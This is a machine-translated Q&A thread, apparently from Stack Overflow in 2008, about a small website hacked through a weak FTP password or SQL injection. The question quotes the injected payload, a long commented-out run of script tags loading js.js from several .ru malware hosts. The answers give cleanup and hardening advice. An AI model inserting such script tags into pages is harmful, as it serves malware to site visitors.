23

我爸爸今天打电话给我,说访问他的网站的人正在尝试将 168 种病毒下载到他们的计算机上。他根本不是技术人员,而是用所见即所得的编辑器构建了整个东西。

我打开了他的网站并查看了源代码,在源代码底部的结束 HTML 标记之前有一行 Javascript 包含。他们包括这个文件(以及许多其他文件):http ://www.98hs.ru/js.js <--在你去那个 URL 之前关闭 JAVASCRIPT。

所以我暂时把它注释掉了。事实证明,他的 FTP 密码是一个普通的字典单词,长度为六个字母,所以我们认为这就是它被黑客入侵的原因。我们已将他的密码更改为一个 8 位以上的非单词字符串(他不会输入密码,因为他是个打猎打字员)。

在 98hs.ru 上做了一个 whois,发现它是由智利的服务器托管的。实际上也有一个与之相关的电子邮件地址,但我严重怀疑这个人是罪魁祸首。可能只是其他一些被黑客入侵的网站......

我现在不知道该怎么做,因为我以前从未处理过这种事情。有人有什么建议吗?

他通过 webhost4life.com 使用普通的 jane 不安全 ftp。我什至看不到在他们的网站上进行sftp 的方法。我在想他的用户名和密码被截获了?

因此,为了使这与社区更相关,您应该采取哪些步骤/应该遵循哪些最佳实践来保护您的网站免受黑客攻击?

为了记录,这是“神奇地”添加到他的文件中的代码行(并且不在他计算机上的文件中——我将其注释掉只是为了绝对确保它不会做任何事情在这个页面上,虽然我确信杰夫会提防这一点):

<!--script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script-->
4

8 回答 8

15

尝试收集尽可能多的信息。看看主机是否可以给你一个日志,显示对你的帐户进行的所有 FTP 连接。您可以使用它们来查看是否是用于进行更改的 FTP 连接并可能获取 IP 地址。

如果您使用的是预先打包的软件,例如 Wordpress、Drupal 或其他任何您未编码的软件,则上传代码中可能存在允许此类修改的漏洞。如果它是定制的,请仔细检查您允许用户上传文件或修改现有文件的任何地方。

第二件事是按原样转储网站并检查所有内容以进行其他修改。这可能只是他们所做的一项修改,但如果他们通过 FTP 进入,谁知道那里还有什么。

将您的站点恢复到已知的良好状态,如果需要,升级到最新版本。

您还必须考虑一定程度的回报。是否值得尝试追踪此人,或者这是否是您生活、学习和使用更强密码的地方?

于 2008-08-06T00:16:07.797 回答
14

我知道这在游戏中有点晚了,但是提到的 JavaScript 的 URL 在已知是 6 月开始的 ASPRox 机器人复兴的一部分的网站列表中提到(至少那是我们被标记的时候)它)。下面提到了一些关于它的细节:

http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

令人讨厌的是,实际上数据库中的每个 varchar 类型字段都被“感染”以吐出对该 URL 的引用,浏览器在其中得到一个很小的 ​​iframe,将其变成机器人。可以在这里找到一个基本的 SQL 修复:

http://aspadvice.com/blogs/programming_shorts/archive/2008/06/27/Asprox-Recovery.aspx

可怕的是,病毒会从系统表中寻找要感染的值,并且许多共享托管计划还为其客户共享数据库空间。因此,很可能甚至不是您父亲的站点被感染,而是他托管集群中的其他人的站点编写了一些糟糕的代码并为 SQL 注入攻击打开了大门。

如果他还没有这样做,我会向他们的主机发送一封紧急电子邮件,并给他们一个指向该 SQL 代码的链接以修复整个系统。您可以修复自己受影响的数据库表,但最有可能进行感染的机器人将再次穿过该漏洞并感染整个数据库。

希望这可以为您提供更多信息。

编辑:再想一想,如果他使用其中一个主机在线设计工具来构建他的网站,那么所有这些内容可能都放在一个列中并以这种方式被感染。

于 2008-08-07T22:49:55.830 回答
5

您提到您的父亲正在使用网站发布工具。

如果发布工具从他的电脑发布到服务器,可能是他的本地文件是干净的,他只需要重新发布到服务器。

他应该看看他的服务器是否有与普通 FTP 不同的登录方法,不过……这不是很安全,因为它通过 Internet 以明文形式发送他的密码。

于 2008-08-06T03:31:22.940 回答
3

使用六个字字符的密码,他可能是被蛮力强迫的。这比他的 ftp 被拦截的可能性更大,但也可能是这样。

从更强的密码开始。(8个字还是比较弱的)

看看这个指向互联网安全博客的链接是否有帮助。

于 2008-08-06T00:00:22.180 回答
2

该网站只是普通的静态 HTML 吗?即,他没有设法为自己编写一个上传页面,允许任何人开车经过上传受感染的脚本/页面?

为什么不询问 webhost4life 是否有可用的 FTP 日志并向他们报告问题。你永远不知道,他们可能很容易接受并为你找出到底发生了什么?

我为共享主机工作,我们总是欢迎这样的报告,通常可以查明基于攻击的确切向量,并建议客户出错的地方。

于 2008-08-06T00:24:23.927 回答
0

拔下网络服务器而不将其关闭以避免关闭脚本。通过另一台计算机作为数据驱动器分析硬盘,看看您是否可以通过日志文件和那种性质的东西确定罪魁祸首。验证代码是否安全,然后从备份中恢复。

于 2008-09-26T20:12:13.310 回答
0

This happened to a client of mine recently that was hosted on ipower. I'm not sure if your hosting environment was Apache based, but if it was be sure to double check for .htaccess files that you did not create, particularly above the webroot and inside of image directories, as they tend to inject some nastiness there as well (they were redirecting people depending on where they came from in the refer). Also check any that you did create for code that you did not write.

于 2008-09-26T20:21:14.443 回答
-1

我们显然是被同一个人黑了!或者机器人,在我们的例子中。他们在一些没有人维护的旧经典 ASP 站点的 URL 中使用 SQL 注入。我们发现了攻击 IP 并在 IIS 中阻止了它们。现在我们必须重构所有旧的 ASP。因此,我的建议是先查看 IIS 日志,以确定问题是否出在您网站的代码或服务器配置中。

于 2008-08-16T16:35:18.043 回答